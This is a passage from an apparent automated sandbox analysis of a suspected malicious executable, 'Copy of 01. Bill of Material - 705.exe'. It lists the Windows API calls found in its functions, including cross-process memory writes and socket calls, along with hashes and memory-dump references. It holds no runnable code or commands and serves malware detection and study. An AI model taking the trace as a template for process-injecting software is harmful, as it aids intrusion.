                        • Sleep.KERNEL32(00000000), ref: 0039E9AD
                        • QueryPerformanceCounter.KERNEL32(?), ref: 0039E9B7
                        • Sleep.KERNEL32 ref: 0039E9F3
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
                        • Instruction ID: de5f8a3087586b7017ad07987b8f7b39e6c90cd5382df53c46c9d972ecd0c1ee
                        • Opcode Fuzzy Hash: 0ed2784ca579f956c7f3928bdcec1520f6e7addfb8161bbb4ca41de0f67fd0f0
                        • Instruction Fuzzy Hash: 37015731C11629DBCF02EBE5DC59AEDBB7CFB08300F050946E502B2241CB38A950CBA1
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
                        • Instruction ID: f4b8a583e418e8e6c59502374420b1b21ab5e941ab30a55de65b41717774a9d4
                        • Opcode Fuzzy Hash: 0b5000002571fb3ac735974c4e422bc7b8ceb60583ab2b2d9ea706238c0fd441
                        • Instruction Fuzzy Hash: 40011979210205BFDB124FA5DC4DE6A3B6EEF893A0F254419FA49D7360DB31EC019B60
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00390FCA
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00390FD6
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00390FE5
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00390FEC
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00391002
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
                        • Instruction ID: d15f2590ac83ac9ca55a116c9e073da48f73978d64144c7e32aa92c01500f869
                        • Opcode Fuzzy Hash: 8c82d1089d589c5e1b7f3af3456c0f29adbd9d6387f07880c916af338edfe7d4
                        • Instruction Fuzzy Hash: 6DF04939210312ABDB224FA5AC49F563BADFF89762F154414FA49D6251CA71EC40CB60
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0039102A
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00391036
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391045
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0039104C
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00391062
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
                        • Instruction ID: 5f4eb8d2b203193ee7c8d6312e85af05f6c3abc1ae045fb359b3f0e45eb9dc8b
                        • Opcode Fuzzy Hash: 7e38ac65e4aaa94e32b4fa2620f5833328ab13785e8eaef0b0ae908c0312aeed
                        • Instruction Fuzzy Hash: 30F06D39210312EBDB236FA5EC49F563BADFF897A1F150414FA49D7250CA71E8408B60
                        APIs
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0324
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0331
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A033E
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A034B
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0358
                        • CloseHandle.KERNEL32(?,?,?,?,003A017D,?,003A32FC,?,00000001,00372592,?), ref: 003A0365
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
                        • Instruction ID: ac43862df00c9d4a57ab0154d64256190a85d199bdbf366b6b0ca21c88759b85
                        • Opcode Fuzzy Hash: b1c7b035b07d8f8bbaa776d36cfb266c41b7c55c9d21c97e0744dda150176431
                        • Instruction Fuzzy Hash: 6F01EE7A800B018FCB36AF66D880802FBF9FF613053068A3FD19652970C3B1A948CF80
                        APIs
                        • _free.LIBCMT ref: 0036D752
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 0036D764
                        • _free.LIBCMT ref: 0036D776
                        • _free.LIBCMT ref: 0036D788
                        • _free.LIBCMT ref: 0036D79A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
                        • Instruction ID: 25088ef0dd8a663047f7afbc113753d250dc0d5d45ecab6d462a12b974622e66
                        • Opcode Fuzzy Hash: 02914dbda1f049de4e942836dbfd0ef79e9d63914e166abbaf347bc4457efa37
                        • Instruction Fuzzy Hash: A1F01232B54608ABC627EF64FAC5C2777DDBB46750B969805F048DB509CB30FC90C665
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00395C58
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00395C6F
                        • MessageBeep.USER32(00000000), ref: 00395C87
                        • KillTimer.USER32(?,0000040A), ref: 00395CA3
                        • EndDialog.USER32(?,00000001), ref: 00395CBD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: c4dde47f9b51479141d185cdc0f570bc63ee1e745658e2571c4715769442e21c
                        • Instruction ID: e529dc4da4e6ac98d382f05aa4487d3c9b649a93444ddc754f3d165d34a1f27f
                        • Opcode Fuzzy Hash: c4dde47f9b51479141d185cdc0f570bc63ee1e745658e2571c4715769442e21c
                        • Instruction Fuzzy Hash: AD016D30510B04ABEF235B10DE4EFA677BCBB00B05F041559E686A15E1DBF5A9948F90
                        APIs
                        • _free.LIBCMT ref: 003622BE
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 003622D0
                        • _free.LIBCMT ref: 003622E3
                        • _free.LIBCMT ref: 003622F4
                        • _free.LIBCMT ref: 00362305
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
                        • Instruction ID: c698bccd591acda3dcc594fb1fae344dfe7885d17adda8952b4225fd206e1edb
                        • Opcode Fuzzy Hash: e39be8d8c096aafcc24cab3b3a44b49a4f6556971ba00d3a94f8e13cf5b1d85a
                        • Instruction Fuzzy Hash: BEF0B4705509118BC717AF54BE0191A3BE4F71A790F02456EF000F6279C7750821FFE9
                        APIs
                        • EndPath.GDI32(?), ref: 003495D4
                        • StrokeAndFillPath.GDI32(?,?,003871F7,00000000,?,?,?), ref: 003495F0
                        • SelectObject.GDI32(?,00000000), ref: 00349603
                        • DeleteObject.GDI32 ref: 00349616
                        • StrokePath.GDI32(?), ref: 00349631
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
                        • Instruction ID: 85e92859b8d61c1a982ebb4056d3cc0f03d467180297ba19382af70a4e8a123a
                        • Opcode Fuzzy Hash: 5cdcc12b845f7277d1ffe16f25359259770ae86d52786bc99064f619a5adf66a
                        • Instruction Fuzzy Hash: 83F04F71005204EFDB135F65EE1CB653FA9BB01332F148225F469A90F0C734A991DF28
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __freea$_free
                        • String ID: a/p$am/pm
                        • API String ID: 3432400110-3206640213
                        • Opcode ID: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
                        • Instruction ID: ac3fc6f415ba77bcb67fda250c3576871ab36d4fc048c988165f79a1dedc038a
                        • Opcode Fuzzy Hash: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
                        • Instruction Fuzzy Hash: 45D10339900206CACB2B9F68C855BFAB7B4FF06300F2DC159E9069BB58D3759D80CB91
                        APIs
                          • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
                          • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                        • __Init_thread_footer.LIBCMT ref: 003B6238
                          • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
                          • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
                          • Part of subcall function 003A359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
                          • Part of subcall function 003A359C: LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                        • String ID: x#@$x#@$x#@
                        • API String ID: 1072379062-2468959183
                        • Opcode ID: 3aad11503061272188dd651fa1783af55f7198b2de37a8a20ca64c5f25540910
                        • Instruction ID: df6b68be03d2e3ac3a4eee46a37992ed5722ace6b75ef8d3fab6bd6f5d8952ed
                        • Opcode Fuzzy Hash: 3aad11503061272188dd651fa1783af55f7198b2de37a8a20ca64c5f25540910
                        • Instruction Fuzzy Hash: 90C19071A00105AFDB26DF58C891EFEB7B9EF49304F11802AFA05AB692D774ED44CB90
                        APIs
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00368B6E
                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00368B7A
                        • __dosmaperr.LIBCMT ref: 00368B81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                        • String ID: .5
                        • API String ID: 2434981716-4279605997
                        • Opcode ID: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
                        • Instruction ID: 5e70548a9316937d7a28264921870ad77b51c1bfeda0cebb3368f074f60b3547
                        • Opcode Fuzzy Hash: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
                        • Instruction Fuzzy Hash: 7F41ACB0604045AFDB239F68C880AB93FAADF4D304F29C7A9F8849B546DE318C029794
                        APIs
                          • Part of subcall function 0039B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921D0,?,?,00000034,00000800,?,00000034), ref: 0039B42D
                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00392760
                          • Part of subcall function 0039B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0039B3F8
                          • Part of subcall function 0039B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0039B355
                          • Part of subcall function 0039B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B365
                          • Part of subcall function 0039B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B37B
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003927CD
                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0039281A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
                        • Instruction ID: 7aff7f628fe8d37d735bfad4391065f33ac8b6b1b30bc84e8cc53f73a63405f5
                        • Opcode Fuzzy Hash: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
                        • Instruction Fuzzy Hash: 1A411976900218BFDF11DBA4DD85EEEBBB8AF09700F104099FA55BB181DB706E45CBA1
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe,00000104), ref: 00361769
                        • _free.LIBCMT ref: 00361834
                        • _free.LIBCMT ref: 0036183E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
                        • API String ID: 2506810119-2736972374
                        • Opcode ID: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
                        • Instruction ID: c317a8b2fc711ad3273c61253e9826ea5b29ea32b00640d5d325b23abcc850fd
                        • Opcode Fuzzy Hash: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
                        • Instruction Fuzzy Hash: 57316275A00218AFDB22DF99D885D9EBBFCEB85310F1981AAF804EB215D7705E40DB94
                        APIs
                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0039C306
                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0039C34C
                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00401990,014B6338), ref: 0039C395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$Delete$InfoItem
                        • String ID: 0
                        • API String ID: 135850232-4108050209
                        • Opcode ID: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
                        • Instruction ID: b4012bb34a01f058eeb0d8979df098bbfc3d38313656e41eb7db57a7f4f4cdd0
                        • Opcode Fuzzy Hash: b7d854bce3bead105c4f2876946c0bf6eeff0ed16475dd4e220befff1665423e
                        • Instruction Fuzzy Hash: 8041B0752143019FDB22DF29D884F5ABBE8AF85320F019A1DF8A59B2D1D774E904CB52
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CCC08,00000000,?,?,?,?), ref: 003C44AA
                        • GetWindowLongW.USER32 ref: 003C44C7
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C44D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
                        • Instruction ID: f6367b859199bf80929edfaf55b922dadda588c3dae33a05f67c332d0c13406f
                        • Opcode Fuzzy Hash: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
                        • Instruction Fuzzy Hash: 4B319C31210605AFDB269E38DC45FEA7BA9EB09334F214319F979D21E0DB70EC509750
                        APIs
                        • SysReAllocString.OLEAUT32(?,?), ref: 00396EED
                        • VariantCopyInd.OLEAUT32(?,?), ref: 00396F08
                        • VariantClear.OLEAUT32(?), ref: 00396F12
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$AllocClearCopyString
                        • String ID: *j9
                        • API String ID: 2173805711-176951553
                        • Opcode ID: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
                        • Instruction ID: b705bf688e54ef7a59d5206405f44eb6e8233ac1f4022b5bf0502d312d95d3a5
                        • Opcode Fuzzy Hash: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
                        • Instruction Fuzzy Hash: 7C319172605245DFCF0BAFA4E8929BE77B9EF85300F101499F9038F2A1C7349926DB90
                        APIs
                          • Part of subcall function 003B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,003B3077,?,?), ref: 003B3378
                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                        • _wcslen.LIBCMT ref: 003B309B
                        • htons.WSOCK32(00000000,?,?,00000000), ref: 003B3106
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
